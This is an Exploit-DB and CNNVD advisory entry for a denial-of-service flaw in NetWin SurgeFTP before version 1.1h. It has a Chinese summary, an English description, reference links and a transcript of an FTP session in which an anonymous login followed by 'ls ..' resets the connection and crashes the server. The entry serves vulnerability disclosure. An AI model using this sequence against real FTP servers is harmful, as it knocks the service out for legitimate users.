https://www.exploit-db.com/exploits/20659
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200109-070

NetWinSurgeFTP之前1.1h版本存在漏洞。远程攻击者可以通过’ls点点’命令导致服务拒绝（崩溃）。

source: http://www.securityfocus.com/bid/2442/info

SurgeFTP is a FTP Server distributed and maintained by Netwin. SurgeFTP is a configurable, easily maintained ftp server, functional on both the UNIX and Windows platforms.

A problem with the SurgeFTP program could allow a denial of service to legitimate users. This is due to the handling of malformed requests made by a client. It is possible to cause the server to cease functioning by logging in, and requesting a list of first the root directory, then a list of the directory above the root directory. Upon receiving the request, the ftp server resets connections, and ceases operating.

Therefore, it is possible for a malicious user to deny service to legitimate users by passing the predescribed request to the ftp server.

# ftp localhost
Connected to testbak
220 SurgeFTP testbak (Version 1.0b)
User (testbak:(none)): anonymous
331 Password required for anonymous.
Password:
230- Alias Real path Access
230- / /home read
230 User anonymous logged in.
200 Port command successful.
150 Opening ASCII mode data connection for file list. (/)
226 Transfer complete.
ftp> ls ..
200 Port command successful.
550 Opening ASCII mode data connection for file list. (/..)
-> ftp get:Connection reset by peer

来源:XF
名称:surgeftp-listing-dos(6168)
链接:http://xforce.iss.net/static/6168.php
来源:BUGTRAQ
名称:20010228SurgeFTPDenialofService
链接:http://www.securityfocus.com/archive/1/165816
来源:WIN2KSEC
名称:20010301SurgeFTP1.0bDenialofService
链接:http://www.secadministrator.com/Articles/Index.cfm?ArticleID=20200
来源:netwinsite.com
链接:http://netwinsite.com/surgeftp/manual/updates.htm
来源:BID
名称:2442
链接:http://www.securityfocus.com/bid/2442